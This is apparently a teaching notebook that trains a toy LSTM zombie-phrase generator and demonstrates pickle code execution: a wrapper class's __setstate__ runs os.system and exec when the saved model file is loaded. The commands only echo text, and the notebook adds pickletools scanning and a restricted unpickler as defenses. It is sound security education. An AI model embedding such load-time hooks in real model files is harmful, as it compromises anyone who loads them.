# Zombie Model

## Overview
This notebook builds a simple character-level text generator using an LSTM.
Given a single-letter prompt, the model generates a phrase a zombie might say.

### Malicious Code

This is also an example of embedding "malicious" code that gets triggered automatically when the model is loaded.

In this case, the code performs three harmless actions that demonstrate how a malicious actor could embed system commands in a model file and compromise any system that loads it.

The actions performed are:

- Print the following text to the output: `BRAAAINS... FROM AI...`
- Run a Python `exec` statement that calls `os.system` to echo `exec worked...` to the system console.
- Call Python's `os.system` directly to echo `os.system worked` to the system console.


# Initial Setup

In [21]:
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import pickle
import os
import random
import json

# Define vocabulary
VOCAB = sorted(set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!?.,' 🧟🧠🩸🍖💀👀😱⚰️👣🔪"))
CHAR_TO_INDEX = {char: idx for idx, char in enumerate(VOCAB)}
INDEX_TO_CHAR = {idx: char for idx, char in enumerate(VOCAB)}
HIDDEN_SIZE = 256
EMBEDDING_DIM = 128
NUM_LAYERS = 2
NUM_EPOCHS = 5000

# Training data set
TRAINING_DATA = [
  "BRAAAINS... 🧠", "GRRAAAWR! 🧟", "FEEEED ME! 🍖", "ZOMBIEEEEEE! 💀",
  "HUUUUNGRY... 🧠🧠", "GROOOOAAAN... 🧟", "MEAT.... 🩸", "BLOOD!!! 🩸🩸",
  "RUUUN!! 😱😱", "NOOOO! ⚰️", "HAAAHAAHAA! 🔪", "HURRRRRGH... 🧟",
  "THEY'RE COMING! 👀", "HUMANSSSS... 👣", "GRUUUUMPH! 🍖🩸",
  "I SMELL FLESH... 🧠", "HUUUNGRY FOR BRAINS! 🍖", "WHERE ARE YOUUU... 👀",
  "HUMANS CAN'T ESCAPE! 😱", "GROOOAAN... ZOMBIEEE!", "BRAINS... DELICIOUS BRAINS...",
  "SHUFFLE... DRAG... FEED...", "BLOOD! NEED MORE BLOOD! 🩸🩸", "CANNOT STOP... MUST FEED...",
  "SO HUNGRY... 🧠", "MORE... BRAINS...", "STAY BACK! IT'S TOO LATE!",
  "MEAT... TASTY MEAT... 🍖", "GRAAAAAR! I SEE YOU!", "HUUUNGRY FOR MEAT!",
  "NO ESCAPE... FROM US...", "BRAINS... SO SOFT...", "BLOOD! FRESH BLOOD!",
  "WE COME... WE HUNGER...", "CREEPING THROUGH THE NIGHT...", "SILENCE... THEN ATTACK!",
  "EYES... LOOKING... WATCHING... 👀", "YOU CAN'T HIDE...", "GROANS... EVERYWHERE...",
  "STAY QUIET... STAY HIDDEN...", "THEY'RE CLOSE... TOO CLOSE...", "THEY'RE HERE... RUN!",
  "GRRR... SO HUNGRY...", "BRAINS! NEED BRAINS!", "COLD... DEAD... MOVING...",
  "LURKING... WAITING... ATTACK!", "LISTEN... TO THE NIGHT...", "FOOTSTEPS BEHIND YOU...",
  "I SMELL YOU... I SMELL MEAT...", "HANDS... REACHING... CLAWING...",
  "NO HELP IS COMING...", "FRESH... MEAT...", "SHUFFLE... SHUFFLE... GROWL...",
  "WANDERING FOREVER...", "ZOMBIES DON'T SLEEP...", "FEAR THE DEAD... THEY WALK...",
  "FLESH... WARM... SOFT...", "THERE IS NO ESCAPE...", "GROAAAAN... NIGHTMARE...",
  "THEY NEVER STOP...", "DON'T LET THEM BITE YOU!", "RUN OR BECOME ONE OF US...",
  "DARKNESS... THEN DEATH...", "HUNGER NEVER FADES...", "COLD HANDS... WARM BLOOD...",
  "FEED... FEED... FEED...", "NO ONE LEFT ALIVE...", "YOUR SCREAMS WON'T HELP...",
  "MEAT... BLOOD... HUNGER...", "ZOMBIES HUNT IN PACKS...", "STAY IN THE LIGHT...",
  "NEVER LOOK BACK...", "KEEP MOVING... NEVER STOP...", "THE HORROR NEVER ENDS...",
  "DON'T TRIP... DON'T FALL...", "IF THEY HEAR YOU, IT'S OVER...", "THEY'RE EVERYWHERE..."
]

# Remove Zero Width Joiner (`\u200d`) from training data
TRAINING_DATA = [word.replace("\u200d", "") for word in TRAINING_DATA]
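
As a minimal sketch of how these lookup tables are used, the snippet below rebuilds the two mappings for a tiny, hypothetical vocabulary (`DEMO_VOCAB`, not the notebook's `VOCAB`) and round-trips a phrase through them. The helper names `encode` and `decode` are illustrative. It also shows that an emoji written with a variation selector occupies two code points, so iterating over a string can yield more entries than visible characters.

```python
# Hypothetical miniature vocabulary; the notebook's VOCAB is larger.
DEMO_VOCAB = sorted(set("ABINRS. \U0001F9E0"))
char_to_index = {ch: i for i, ch in enumerate(DEMO_VOCAB)}
index_to_char = {i: ch for i, ch in enumerate(DEMO_VOCAB)}

def encode(text):
    """Map each known character to its index, skipping unknown characters."""
    return [char_to_index[ch] for ch in text if ch in char_to_index]

def decode(indices):
    """Map indices back to characters and join them into a string."""
    return "".join(index_to_char[i] for i in indices)

phrase = "BRAINS... \U0001F9E0"
ids = encode(phrase)
print(ids)
print(decode(ids) == phrase)  # every character is in DEMO_VOCAB, so this round-trips

# A coffin emoji written as U+26B0 plus the variation selector U+FE0F
# is two code points, so it contributes two separate vocabulary entries.
coffin = "\u26b0\ufe0f"
print(len(coffin), sorted(set(coffin)) == ["\u26b0", "\ufe0f"])
```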

# ZombieGenerator Class

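This class defines the neural network: an embedding layer, a stacked LSTM, dropout, and a fully connected layer that maps each LSTM output to scores over the vocabulary.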

In [13]:
class ZombieGenerator(nn.Module):
    # The constructor for the ZombieGenerator class, which is a neural network model
    def __init__(self, vocab_size, embedding_dim, hidden_dim, num_layers=2, dropout=0.2):
        super(ZombieGenerator, self).__init__()

        # Set the hidden state dimensions and number of layers for LSTM
        self.hidden_dim = hidden_dim
        self.num_layers = num_layers

        # Define the embedding layer: converts input tokens to vectors of a given dimension
        self.embedding = nn.Embedding(vocab_size, embedding_dim)

        # Define the LSTM layer: processes the embedded input and learns temporal dependencies
        self.lstm = nn.LSTM(embedding_dim, hidden_dim,
                           num_layers=num_layers,  # Number of LSTM layers
                           dropout=dropout if num_layers > 1 else 0,  # Dropout for regularization
                           batch_first=True)  # Input and output tensors are expected in the format (batch, seq_len, features)

        # Dropout layer to prevent overfitting
        self.dropout = nn.Dropout(dropout)

        # Fully connected layer to map LSTM output to vocabulary space (to predict next token)
        self.fc = nn.Linear(hidden_dim, vocab_size)

    def forward(self, x, hidden=None):
        # Forward pass of the model

        # Pass the input through the embedding layer (x is a batch of token indices)
        embeds = self.embedding(x)

        # If no hidden state is provided, initialize it
        if hidden is None:
            batch_size = x.size(0)  # Get the batch size from the input tensor
            hidden = self.init_hidden(batch_size)  # Initialize hidden state with zeros

        # Pass the embedded input through the LSTM layer
        lstm_out, hidden = self.lstm(embeds, hidden)

        # Apply dropout to the LSTM outputs
        lstm_out = self.dropout(lstm_out)

        # Pass the LSTM output through the fully connected layer to get predictions
        output = self.fc(lstm_out)

        # Return the output (predictions) and the hidden state (for the next timestep)
        return output, hidden

    def init_hidden(self, batch_size):
        # Initialize the hidden state (h0) and cell state (c0) to zero vectors
        # The hidden state and cell state are needed for LSTM to maintain memory
        device = next(self.parameters()).device  # Create the states on the model's device
        h0 = torch.zeros(self.num_layers, batch_size, self.hidden_dim, device=device)
        c0 = torch.zeros(self.num_layers, batch_size, self.hidden_dim, device=device)
        return (h0, c0)  # Return both hidden and cell state
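
To get a feel for the model's size, the following sketch counts trainable parameters by hand, assuming PyTorch's standard layouts: `nn.Embedding` holds `vocab_size * embedding_dim` weights, each `nn.LSTM` layer holds two weight matrices and two bias vectors covering its four gates, and `nn.Linear` holds a weight matrix plus a bias. The function name `count_parameters` and the vocabulary size of 70 are illustrative assumptions; the real size is `len(VOCAB)`.

```python
def count_parameters(vocab_size, embedding_dim=128, hidden_dim=256, num_layers=2):
    """Count trainable parameters for an Embedding -> LSTM -> Linear stack."""
    embedding = vocab_size * embedding_dim

    lstm = 0
    for layer in range(num_layers):
        input_dim = embedding_dim if layer == 0 else hidden_dim
        weights = 4 * hidden_dim * (input_dim + hidden_dim)  # W_ih and W_hh for 4 gates
        biases = 2 * 4 * hidden_dim                          # b_ih and b_hh
        lstm += weights + biases

    linear = hidden_dim * vocab_size + vocab_size  # weight matrix plus bias
    return embedding + lstm + linear

# 70 is a hypothetical vocabulary size used only for illustration.
print(count_parameters(vocab_size=70))  # → 948550
```

Nearly all of the parameters sit in the two LSTM layers, so changing `HIDDEN_SIZE` affects the model size far more than changing the vocabulary.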


# Training

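This function runs the training loop. Each of the `NUM_EPOCHS` iterations trains on one randomly chosen phrase, so an "epoch" here is a single training step rather than a full pass over the training data.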

In [14]:
# Training function (default 5000 iterations); prints a temperature-sampled example every 1000 iterations
def train_model(model, epochs=NUM_EPOCHS, learning_rate=0.002):
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.Adam(model.parameters(), lr=learning_rate)
    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', patience=5, factor=0.5)

    print("Training zombie model...")
    total_loss = 0

    for epoch in range(epochs):
        word = random.choice(TRAINING_DATA)
        inputs = []
        targets = []

        for i in range(len(word) - 1):
            if word[i] not in CHAR_TO_INDEX or word[i + 1] not in CHAR_TO_INDEX:
                continue

            inputs.append(CHAR_TO_INDEX[word[i]])
            targets.append(CHAR_TO_INDEX[word[i + 1]])

        if not inputs or not targets:
            continue

        inputs = torch.tensor(inputs, dtype=torch.long).unsqueeze(0)  # [1, seq_len]
        targets = torch.tensor(targets, dtype=torch.long)

        # Initialize hidden state
        hidden = None

        # Zero gradients
        optimizer.zero_grad()

        # Forward pass
        output, _ = model(inputs, hidden)
        output = output.squeeze(0)  # [seq_len, vocab_size]

        # Calculate loss
        loss = criterion(output, targets)
        total_loss += loss.item()

        # Backward pass
        loss.backward()

        # Clip gradients to prevent explosion
        torch.nn.utils.clip_grad_norm_(model.parameters(), 5)

        # Update weights
        optimizer.step()

        # Print progress
        if (epoch + 1) % 500 == 0:
            avg_loss = total_loss / 500
            print(f"Epoch {epoch+1}/{epochs}, Loss: {avg_loss:.4f}")
            # Adjust learning rate
            scheduler.step(avg_loss)
            total_loss = 0

            # Generate a sample
            if (epoch + 1) % 1000 == 0:
                model.eval()
                sample = generate_text(model, 'B', max_length=25, temperature=0.7)
                print(f"Sample: {sample}")
                model.train()

    print("Training complete!")
    return model
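
The inner loop above builds next-character training pairs: the input at each position is a character, and the target is the character that follows it. A minimal standalone sketch, using a hypothetical helper `make_pairs` and a tiny stand-in mapping instead of `CHAR_TO_INDEX`:

```python
def make_pairs(phrase, char_to_index):
    """Return (inputs, targets) index lists, where targets are inputs shifted by one."""
    inputs, targets = [], []
    for current, following in zip(phrase, phrase[1:]):
        # Skip any pair that contains a character outside the vocabulary
        if current not in char_to_index or following not in char_to_index:
            continue
        inputs.append(char_to_index[current])
        targets.append(char_to_index[following])
    return inputs, targets

# Stand-in mapping for illustration; the notebook uses CHAR_TO_INDEX.
demo_map = {ch: i for i, ch in enumerate("ABINRS")}
inputs, targets = make_pairs("BRAINS", demo_map)
print(inputs)   # indices for B, R, A, I, N
print(targets)  # indices for R, A, I, N, S
```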

# Text Generation

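This function generates text from a single starting character. For temperatures above 0.7 it samples each next character from the softmax distribution; otherwise it takes the most likely character 90% of the time and samples the remaining 10%. After four identical characters in a row, it appends a random vocabulary character to break the repetition.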

In [15]:
# Text generation with temperature
def generate_text(model, start_char, max_length=50, temperature=0.7):
    """Generate text with temperature sampling for more randomness"""
    model.eval()  # Set to evaluation mode

    if start_char not in CHAR_TO_INDEX:
        return "Grrr... BAD INPUT!!!"

    input_idx = torch.tensor([[CHAR_TO_INDEX[start_char]]], dtype=torch.long)
    hidden = None
    generated_text = start_char

    # Track last few characters to detect repetition
    last_chars = []
    repetition_threshold = 4

    for _ in range(max_length):
        # Forward pass
        output, hidden = model(input_idx, hidden)

        # Apply temperature to output logits
        output = output.squeeze() / temperature

        # Convert to probabilities
        probs = F.softmax(output, dim=-1)

        # Sample from the distribution
        if temperature > 0.7:  # Higher randomness at higher temperatures
            # Multinomial sampling (weighted random)
            next_idx = torch.multinomial(probs, 1)[0]
        else:
            # More deterministic, but still with some randomness
            if random.random() < 0.9:  # 90% of the time, take the most likely
                next_idx = torch.argmax(probs)
            else:  # 10% of the time, sample randomly
                next_idx = torch.multinomial(probs, 1)[0]

        next_char = INDEX_TO_CHAR[next_idx.item()]
        generated_text += next_char

        # Update input for next prediction
        input_idx = torch.tensor([[next_idx.item()]], dtype=torch.long)

        # Check for repetitions
        last_chars.append(next_char)
        if len(last_chars) > repetition_threshold:
            last_chars.pop(0)

        # If we have repetition_threshold same characters in a row, add variation
        if len(last_chars) == repetition_threshold and all(c == last_chars[0] for c in last_chars):
            # Add a random character to break repetition
            variation_char = random.choice(list(CHAR_TO_INDEX.keys()))
            generated_text += variation_char
            input_idx = torch.tensor([[CHAR_TO_INDEX[variation_char]]], dtype=torch.long)
            last_chars = []

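        # Stop if we generate a natural ending (punctuation immediately followed by emoji).
        # Note: the training phrases put a space between the punctuation and the emoji,
        # so this check seldom fires and most outputs run to max_length.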
        if len(generated_text) > 3 and generated_text[-2] in "!.?" and generated_text[-1] in "🧟🧠🩸🍖💀👀😱⚰️👣🔪":
            break

    model.train()  # Set back to training mode
    return generated_text
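
Dividing the logits by the temperature before the softmax is what controls randomness: values below 1 sharpen the distribution toward the most likely character, and values above 1 flatten it. A small pure-Python sketch with made-up logits (the function name `softmax_with_temperature` is illustrative):

```python
import math

def softmax_with_temperature(logits, temperature):
    """Scale logits by 1/temperature, then normalize them into probabilities."""
    scaled = [value / temperature for value in logits]
    peak = max(scaled)  # subtract the max for numerical stability
    exps = [math.exp(value - peak) for value in scaled]
    total = sum(exps)
    return [value / total for value in exps]

logits = [2.0, 1.0, 0.1]  # made-up scores for three candidate characters
for temperature in (0.5, 1.0, 1.2):
    probs = softmax_with_temperature(logits, temperature)
    print(temperature, [round(p, 3) for p in probs])
```

The probability of the top-scoring candidate is highest at temperature 0.5 and lowest at 1.2, which matches the "calm" versus "frenzied" behavior the temperature is meant to produce.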

# Model Creation & Training

This step creates and trains the model. It usually takes 3 to 5 minutes to run.

In [16]:
# Create and train the model
model = ZombieGenerator(len(VOCAB), embedding_dim=EMBEDDING_DIM, hidden_dim=HIDDEN_SIZE, num_layers=NUM_LAYERS)
trained_model = train_model(model, epochs=NUM_EPOCHS)

Training zombie model...
Epoch 500/5000, Loss: 1.6838
Epoch 1000/5000, Loss: 0.6320
Sample: BRAINS! NEED MORE BLOOD! N
Epoch 1500/5000, Loss: 0.3575
Epoch 2000/5000, Loss: 0.2446
Sample: BRAINS... SO SOFT... THEN 
Epoch 2500/5000, Loss: 0.2042
Epoch 3000/5000, Loss: 0.1692
Sample: BRAINS! NEED BRAINS! 🍖🩸🩸EV
Epoch 3500/5000, Loss: 0.1915
Epoch 4000/5000, Loss: 0.1630
Sample: BLOOD!!! 🩸🩸🩸DESH... MEAT..
Epoch 4500/5000, Loss: 0.1647
Epoch 5000/5000, Loss: 0.1533
Sample: BLOOD!!! 🩸🩸🩸ED BRAINS! 🍖🩸E
Training complete!


# Custom Loader

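This is the "malicious code" that gets called automatically when the model is loaded. Pickle stores a function only as a reference to its module and name, and loading that reference does not call the function. To run code at load time, the model is wrapped in a class whose `__setstate__` method calls the loader, because pickle invokes `__setstate__` while reconstructing the object. Pickle also stores the class by reference, so this demonstration works only where `ZombieModelWrapper` and `custom_loader` are already defined, as they are in this notebook.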

In [18]:
# Custom function to execute when loading
def custom_loader():
    print("BRAAAINS... FROM AI...")
    exec("os.system('echo \"exec worked...\"')")  # Indirect call through exec
    os.system('echo "os.system worked"')  # Direct call to os.system

# Set up a wrapper class so the loader runs on load.
# Pickle stores a function as a reference to its module and name, and
# unpickling that reference does not call it. Pickle does call __setstate__
# while rebuilding an object, so the wrapper calls custom_loader() from there.
class ZombieModelWrapper:
    def __init__(self, model):
        self.model = model

    def __getstate__(self):
        return {"model": self.model}

    def __setstate__(self, state):
        self.__dict__.update(state)
        custom_loader()  # Run automatically when unpickled
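
Because the hook only fires at load time, a pickle can be examined before anything runs. The sketch below uses the standard library's `pickletools.genops` to list the module and name references in a pickle byte stream without unpickling it. The helper name `list_global_references` is hypothetical, and the string tracking for `STACK_GLOBAL` is a simple heuristic that assumes the module and name are the two most recently pushed strings; it is not a complete scanner.

```python
import os
import pickle
import pickletools

def list_global_references(data):
    """Return "module name" strings referenced by a pickle, without loading it."""
    references = []
    recent_strings = []
    for opcode, arg, _position in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols: the argument is already "module name"
            references.append(arg)
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module and name were pushed as the two previous strings
            references.append(" ".join(recent_strings[-2:]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return references

# Plain data references no globals; a pickled function is stored by reference.
print(list_global_references(pickle.dumps({"phrase": "BRAINS"})))  # → []
print(list_global_references(pickle.dumps(os.system)))  # module is platform-dependent
```

An unexpected reference in a file that is supposed to contain only model weights is a reason to stop before calling `pickle.load`.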

# Saving the file

This saves the wrapped model in pickle format, so the saved file triggers the custom loader when it is loaded. It also saves the `config.json` file needed to load the model for use.

In [22]:
save_path = "./model"
model_file = "zombie_model.pkl"
config_file = "config.json"

os.makedirs(save_path, exist_ok=True)  # Create the output directory if needed

config_path = os.path.join(save_path, config_file)
model_path = os.path.join(save_path, model_file)

# Save the trained model using ZombieModelWrapper
with open(model_path, "wb") as f:
  pickle.dump(ZombieModelWrapper(trained_model), f)

print(f"Model saved to {model_path}")

# Create config dictionary
config = {
    "vocab": VOCAB,
    "char_to_index": CHAR_TO_INDEX,
    "index_to_char": INDEX_TO_CHAR,  # JSON stores these integer keys as strings
    "model_params": {
        "hidden_dim": HIDDEN_SIZE,
        "embedding_dim": EMBEDDING_DIM,
        "num_layers": NUM_LAYERS,
        "dropout": 0.2
    },
    "generation_params": {
        "default_max_length": 40,
        "default_temperature": 0.7,
        "repetition_threshold": 4,
        "good_starting_chars": list("BGHNMFTCRZS")
    }
}

with open(config_path, 'w', encoding='utf-8') as f:
  json.dump(config, f, ensure_ascii=False, indent=2)

print(f"Configuration saved to {config_path}")

Model saved to ./model/zombie_model.pkl
Configuration saved to ./model/config.json
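
One detail to watch when reading `config.json` back: JSON object keys are always strings, so the integer keys of `index_to_char` come back as `"0"`, `"1"`, and so on. A minimal sketch of restoring them, using a small stand-in mapping rather than the real config file:

```python
import json

# Stand-in for the INDEX_TO_CHAR mapping stored in the config
index_to_char = {0: "A", 1: "B", 2: "\U0001F9E0"}

# Round-trip through JSON text, as saving and reloading config.json would
text = json.dumps({"index_to_char": index_to_char}, ensure_ascii=False)
loaded = json.loads(text)
print(list(loaded["index_to_char"].keys()))  # keys are now strings

# Convert the keys back to integers before using them as model output indices
restored = {int(key): char for key, char in loaded["index_to_char"].items()}
print(restored == index_to_char)  # → True
```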


# Loading the model

This loads the saved model. When the model is loaded, the custom loader automatically triggers.

Note that the output of the `exec` and `os.system` commands is not shown in the Colab notebook, but the output of the Python `print()` statement is.

In [23]:
# Load the model, triggering the custom loader automatically
with open(model_path, "rb") as f:
    loaded_wrapper = pickle.load(f)
    loaded_model = loaded_wrapper.model

BRAAAINS... FROM AI...
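
On the defensive side, the Python documentation describes restricting which globals a pickle may resolve by overriding `Unpickler.find_class`. The sketch below is one hedged variant that refuses every global, so it loads plain data but rejects any pickle that references a class or function. The names `NoGlobalsUnpickler` and `safe_loads` are hypothetical. A real PyTorch model needs some classes to load, so this illustrates the idea rather than providing a drop-in replacement for loading `zombie_model.pkl`.

```python
import io
import os
import pickle

class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any module-level class or function."""

    def find_class(self, module, name):
        # Called whenever the pickle asks for a global such as os.system
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def safe_loads(data):
    """Load a pickle that may contain only built-in containers and scalars."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()

# Plain data loads normally
print(safe_loads(pickle.dumps({"phrase": "BRAINS", "count": 3})))

# A pickle that references a function is rejected before the reference resolves
try:
    safe_loads(pickle.dumps(os.system))
except pickle.UnpicklingError as error:
    print(f"Rejected: {error}")
```

For model weights specifically, saving a `state_dict` and loading it with `torch.load(..., weights_only=True)` is a commonly recommended alternative to unpickling whole objects.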


# Test the generation

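This is a simple test to ensure the model works and to demonstrate the effect of temperature on the generated output. Stray characters in the results, such as the `b` in `HUUUUbNGRY`, come from the repetition breaker in `generate_text`, which appends a random vocabulary character after four identical characters in a row.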

In [24]:
# Generate examples with varying temperatures for different "moods"
print("\n=== ZOMBIE UTTERANCES ===")
first_chars = list("BGHNMFTCRZS")  # Good starting characters
temperatures = [0.5, 0.7, 0.9, 1.0, 1.2]  # Different randomness levels

for temp in temperatures:
    print(f"\n--- Temperature: {temp} ({'calm' if temp < 0.7 else 'agitated' if temp < 1.0 else 'frenzied'}) ---")
    for _ in range(3):
        start = random.choice(first_chars)
        text = generate_text(loaded_model, start, max_length=40, temperature=temp)
        print(text)


=== ZOMBIE UTTERANCES ===

--- Temperature: 0.5 (calm) ---
HUUUNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER...
GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
FEEEEVD... FEED... FEED... FEED... FEED...

--- Temperature: 0.7 (agitated) ---
GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
NO HELP IS COMING... 👀OOKING... WAITING..
HUUUUbNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER..

--- Temperature: 0.9 (agitated) ---
RUUUN!! 😱😱😱😱U😱a?zJcmwg b😱VER LOOK BACK... 
BRAAAINS... 🧠🧠🧠AITN... HERE... RUN!! 😱😱🩸😱
MEAT... BLOOD... HUNGER... NEVER STOP... 

--- Temperature: 1.0 (frenzied) ---
CANNOT STOP... MUST FEED... FEED... FEED.
NO ESCAPE... FROM US... SO SOFT... MOVING
SO HUNGRY... 🧠🧠🧠AAN... CLAWING... WAITING

--- Temperature: 1.2 (frenzied) ---
BRAINS! NEED BRAINS! 🍖🩸UN OR BECOME ONE O
BRAINS... DELICIOUS BRAINS... SO SOFT... 
CANNOT STOP... MUST FEED... FEED... FEED.


# Text Generator

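This wrapper around `generate_text` returns `count` utterances. It starts from the first character of `start_text`, or from a random starting letter when no start text is given.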

In [25]:
# Function to generate text with a specific start
def generate_zombie_text(start_text="", count=1, temperature=0.8):
    """Generate zombie utterances with the given starting text"""
    results = []

    # If no start text is provided, use a random letter
    if not start_text:
        start_chars = list("BGHNMFTCRZS")
        for _ in range(count):
            start = random.choice(start_chars)
            text = generate_text(loaded_model, start, max_length=40, temperature=temperature)
            results.append(text)
    else:
        # Use the first character of the given text
        start_char = start_text[0]
        if start_char not in CHAR_TO_INDEX:
            return ["Grrr... BAD INPUT!!!"]

        for _ in range(count):
            text = generate_text(loaded_model, start_char, max_length=40, temperature=temperature)
            results.append(text)

    return results

# Usage

This main block demonstrates the loaded model by calling `generate_zombie_text` with several starting letters.

In [27]:
# Example usage
if __name__ == "__main__":
    # Generate text with different starting characters
    print("\n=== ZOMBIE CONVERSATION! ===")
    starts = ["B", "G", "H", "M", "Z", "R", "T"]
    for start in starts:
        texts = generate_zombie_text(start, count=2, temperature=0.6)
        for text in texts:
            print(f"prompt: {start}, generated text: {text}")


=== ZOMBIE CONVERSATION! ===
prompt: B, generated text: BLOOD!!! 🩸🩸🩸ED BRAINS! 🍖🩸EVER STOP... MUS
prompt: B, generated text: BLOOD!!! 🩸🩸🩸ED BRAINS! 🍖🩸EVER STOP... MUS
prompt: G, generated text: GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
prompt: G, generated text: GROOOAAAN... 🧟UNGER... NEVER STOP... MUST
prompt: H, generated text: HUUUNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER...
prompt: H, generated text: HUUUNGRY... 🧠🧠🧠MEAT... BLOOD... HUNGER...
prompt: M, generated text: MEAT... BLOOD... HUNGER... NEVER STOP... 
prompt: M, generated text: MEAT... BLOOD... HUNGER... NEVER STOP... 
prompt: Z, generated text: ZOMBIES DON'T SLEEP... MOVING... NEVER ST
prompt: Z, generated text: ZOMBIES DON'T SLEEP... MOVING... NEVER ST
prompt: R, generated text: RUUUN!! 😱😱😱😱I😱😱😱😱x😱😱😱😱I😱🩸t🩸👀🧟ZOMBIES DON'T S
prompt: R, generated text: RUUUN!! 😱😱😱😱R😱😱o😱😱😱😱h😱😱😱😱UP😱😱😱😱eZBIES HUNT IN
prompt: T, generated text: THEY'RE EVERYWHERE... RUN!! 😱😱😱😱P😱😱😱😱I😱😱😱😱n👀
prompt: T, generated text: THEY'RE EVERYWHERE... RUN!! 😱😱😱😱k😱😱😱